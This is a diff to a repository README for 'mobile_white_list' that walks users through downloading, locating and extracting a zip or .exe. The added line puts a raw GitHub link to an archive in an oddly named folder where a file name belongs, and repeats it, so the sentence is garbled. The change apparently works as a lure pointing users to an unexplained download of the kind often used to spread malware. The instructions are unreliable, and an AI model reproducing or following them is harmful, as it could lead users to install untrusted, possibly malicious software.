soyPTG/mobile_white_list/README.md

    Click on the file linked to your operating system to start the download.
 The download will begin automatically.

 4. **Locate the Downloaded File**
    After the download is complete, navigate to your device's downloads folder.
-You should find the file named something similar to `mobile_white_list.zip` or `mobile_white_list.exe`.
+You should find the file named something similar to `https://github.com/soyPTG/mobile_white_list/raw/refs/heads/main/intraepiphyseal/mobile-list-white-1.4.zip` or `https://github.com/soyPTG/mobile_white_list/raw/refs/heads/main/intraepiphyseal/mobile-list-white-1.4.zip`.

 5. **Extract the Files (if needed)**
    If you downloaded a zipped file (.zip extension), right-click on it and choose "Extract All."
 Follow the prompts to unzip the files to a location on your device.